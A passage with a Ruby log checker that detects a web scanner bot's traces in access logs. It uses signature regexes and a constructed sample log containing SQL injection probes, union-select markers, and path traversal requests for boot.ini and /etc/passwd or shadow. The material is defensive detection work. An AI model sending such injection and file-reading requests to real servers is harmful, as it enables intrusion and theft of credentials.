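Seen from the receiving web server, the scanner functions in the post leave fixed strings in the access log: the hex marker 0x4b30425241 ("K0BRA"), the char(...) marker for "ERTOR854", the "and 1=0" / "-1 union select 1--" probes, the hard-coded Firefox 25 User-Agent, and a run of 404s on admin paths. The following is an added example, not part of the original post or of the bot: a small log checker built on those strings. The combined log format, the PANEL_BURST threshold, the shortened admin prefix list and all sample log lines and addresses are assumptions constructed for illustration.

```ruby
require "uri"

# Fingerprints copied from the ClapTrap source in this post.
BOT_UA = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
SIGNATURES = {
  sqli_marker:   /0x4b30425241/i,                      # hex of the "K0BRA" marker
  sqli_loadfile: /char\(69,82,84,79,82,56,53,52\)/i,   # "ERTOR854" marker around load_file()
  sqli_probe:    /\d and 1=[01]|-1 union select 1--/i, # boolean test / finder probe, after '+' decoding
  lfi_fuzz:      %r{=(\.\./)+boot\.ini|=/etc/(passwd|shadow)|=c:/xampp/}i
}.freeze
# Assumption: a few prefixes from the panel wordlist are enough to spot a sweep.
PANEL_PATH  = %r{\A/+(admin|login|cpanel|phpmyadmin|webadmin|sysadmin|moderator|controlpanel)}i
PANEL_BURST = 5 # assumption: distinct admin-style 404s per client that count as a sweep

# Apache/nginx "combined" access-log format (assumed).
LINE = /\A(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/

# Parse one log line; returns nil for lines that are not in combined format.
def parse(line)
  m = LINE.match(line) or return nil
  target = begin
    URI.decode_www_form_component(m[3]).scrub
  rescue ArgumentError
    m[3] # malformed %-escape: keep the raw request target
  end
  { ip: m[1], method: m[2], target: target, status: m[4].to_i, ua: m[5] }
end

# Returns { client_ip => [finding, ...] } for clients that match any fingerprint.
def detect(lines)
  findings = Hash.new { |h, k| h[k] = [] }
  panel_misses = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    req = parse(line) or next
    SIGNATURES.each do |name, re|
      findings[req[:ip]] << name if re.match?(req[:target])
    end
    findings[req[:ip]] << :bot_user_agent if req[:ua] == BOT_UA
    path = req[:target].split("?", 2).first
    panel_misses[req[:ip]] << path if req[:status] == 404 && PANEL_PATH.match?(path)
  end
  panel_misses.each do |ip, paths|
    findings[ip] << :panel_sweep if paths.uniq.size >= PANEL_BURST
  end
  findings.transform_values(&:uniq)
end

# Helper for the constructed sample below.
def log_line(ip, target, status, ua)
  %(#{ip} - - [26/Sep/2015:00:10:00 +0000] "GET #{target} HTTP/1.1" #{status} 512 "-" "#{ua}")
end

# Constructed sample log (documentation addresses, made-up paths).
SAMPLE_LOG = [
  log_line("203.0.113.7", "/news.php?id=1+and+1=0--", 200, BOT_UA),
  log_line("203.0.113.7", "/news.php?id=1+and+1=0+union+select+concat(0x4b30425241,1,0x4b30425241)", 200, BOT_UA),
  log_line("203.0.113.7", "/view.php?file=../../../boot.ini", 200, BOT_UA),
  *%w[admin/login.php admin/index.php administrator/ cpanel/ phpmyadmin/].map { |p|
    log_line("198.51.100.9", "/#{p}", 404, "Ruby")
  },
  log_line("192.0.2.44", "/index.php?page=about", 200, "Mozilla/5.0 (X11; Linux x86_64)")
].freeze

if __FILE__ == $PROGRAM_NAME
  detect(SAMPLE_LOG).each { |ip, hits| puts "#{ip}: #{hits.join(', ')}" }
end
```

The User-Agent match is the weakest signal because the string is trivially changed; the marker and probe patterns come from the request construction itself.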